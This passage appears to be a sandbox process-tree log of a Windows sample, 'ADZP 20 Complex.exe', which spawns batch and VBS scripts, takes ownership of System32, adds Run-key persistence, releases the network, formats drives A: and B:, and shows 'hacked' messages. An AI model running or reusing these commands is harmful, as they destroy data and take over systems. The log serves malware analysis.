C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5836

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:6136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:5768

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6700

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:6048

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:3816

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:4020

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
PID:6216

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:6188

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5632

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8248

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5984

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:10080

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:10396

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:4900

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:12416

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8568

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:13568

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:4676

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:10276

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:15812

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:16360

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:17072

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:16704

C:\Windows\system32\calc.exe
calc
7⤵
PID:10800

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:13600

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:17216

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:17296

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:13464

C:\Windows\system32\calc.exe
calc
7⤵
PID:12168

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:11784

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:17532

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:17772

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:18108

C:\Windows\system32\calc.exe
calc
7⤵
PID:18208

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:18268

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:18304

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:2692

C:\Windows\system32\calc.exe
calc
5⤵
PID:3200

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:4084

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3704

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C38D.tmp\C38E.tmp\C38F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
PID:5880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:6080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:2404

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:6120

C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6756

C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:584

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:6180

C:\Windows\SysWOW64\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
PID:6280

C:\Windows\SysWOW64\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:8140

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:6192

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:9060

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:920

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:4688

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9232

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:9528

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:10320

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:11528

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:12376

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:13580

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:13716

C:\Windows\SysWOW64\notepad.exe
notepad
7⤵
PID:12184

C:\Windows\SysWOW64\calc.exe
calc
7⤵
PID:10972

C:\Windows\SysWOW64\explorer.exe
explorer.exe
7⤵
PID:14360

C:\Windows\SysWOW64\mspaint.exe
mspaint.exe
7⤵
PID:14424

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:14468

C:\Windows\SysWOW64\notepad.exe
notepad
7⤵
PID:14576

C:\Windows\SysWOW64\calc.exe
calc
7⤵
PID:14640

C:\Windows\SysWOW64\explorer.exe
explorer.exe
7⤵
PID:14708

C:\Windows\SysWOW64\mspaint.exe
mspaint.exe
7⤵
PID:14780

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:14836

C:\Windows\SysWOW64\notepad.exe
notepad
7⤵
PID:14912

C:\Windows\SysWOW64\calc.exe
calc
7⤵
PID:15092

C:\Windows\SysWOW64\explorer.exe
explorer.exe
7⤵
PID:15160

C:\Windows\SysWOW64\mspaint.exe
mspaint.exe
7⤵
PID:15208

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:15552

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:16340

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:16600

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:1028

C:\Windows\system32\calc.exe
calc
5⤵
PID:3512

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:4040

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3684

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4104

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3DB.tmp\C3DC.tmp\C3DD.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
PID:5940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:2820

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:5912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:6096

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6732

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:6112

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:2472

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:6164

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
PID:6272

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:5580

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:8252

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8808

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5824

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:9536

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9936

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:9752

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:11964

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:11456

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:14084

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:15020

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:15176

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:11864

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:15920

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:11684

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:12924

C:\Windows\system32\calc.exe
calc
7⤵
PID:11072

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:15812

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:13508

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:16288

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:16412

C:\Windows\system32\calc.exe
calc
7⤵
PID:16484

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:16508

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:16556

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:16628

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:16772

C:\Windows\system32\calc.exe
calc
7⤵
PID:16836

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:17124

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:17324

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:17484

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:4124

C:\Windows\system32\calc.exe
calc
5⤵
PID:4140

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:4148

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4164

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4408

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:4728

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4232

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:4480

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4084

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:12848

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12124

C:\Windows\system32\calc.exe
calc
5⤵
PID:13004

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:12364

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12356

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:12456

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12676

C:\Windows\system32\calc.exe
calc
5⤵
PID:8748

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:5896

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12828

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:8968

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12880

C:\Windows\system32\calc.exe
calc
5⤵
PID:11548

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:9136

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11812

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:12756

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:8928

C:\Windows\system32\calc.exe
calc
5⤵
PID:13368

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13388

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13412

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:13472

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:13632

C:\Windows\system32\calc.exe
calc
5⤵
PID:13668

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13692

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13740

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:13800

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:13864

C:\Windows\system32\calc.exe
calc
5⤵
PID:13908

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13940

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13984

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:13732

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10232

C:\Windows\system32\calc.exe
calc
5⤵
PID:14012

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:14052

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:8572

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:12824

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:5436

C:\Windows\system32\calc.exe
calc
5⤵
PID:13516

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13764

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:10672

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:9144

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11052

C:\Windows\system32\calc.exe
calc
5⤵
PID:14404

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:14448

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:14532

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:14628

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:14680

C:\Windows\system32\calc.exe
calc
5⤵
PID:14744

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:14824

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:14884

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:15036

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:15128

C:\Windows\system32\calc.exe
calc
5⤵
PID:15184

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:15220

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:15256

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:15340

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11212

C:\Windows\system32\calc.exe
calc
5⤵
PID:10568

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:15012

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:14068

C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14948

C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
5⤵
- Views/modifies file attributes
PID:15420

C:\Windows\system32\format.com
format /y /q A:
5⤵
PID:13792

C:\Windows\system32\format.com
format /y /q B:
5⤵
PID:17876

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:2128

C:\Windows\system32\calc.exe
calc
3⤵
PID:2188

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:540

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:324

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2864

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2244

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3024

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2280

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1700

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2992

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:7004

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\366C.tmp\366D.tmp\366E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:5152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8884

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:7536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:8672

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:7440

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9288

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:9300

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:11180

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7056

C:\Windows\system32\calc.exe
calc
3⤵
PID:7096

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7040

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7048

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:7064

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\39D5.tmp\39D6.tmp\39D7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:6164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:9200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8296

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:6484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:9256

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9400

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9792

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:5500

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:6548

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7112

C:\Windows\system32\calc.exe
calc
3⤵
PID:6500

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:4388

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:156

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3F22.tmp\3F23.tmp\3F24.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:8460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:5588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8684

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:9688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:9836

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9916

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:6440

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:10664

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:12076

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:1152

C:\Windows\system32\calc.exe
calc
3⤵
PID:2384

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2444

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:2400

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
PID:6828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\425D.tmp\425E.tmp\425F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
PID:7656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:5336

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:6528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:9660

C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9736

C:\Windows\SysWOW64\reg.exe
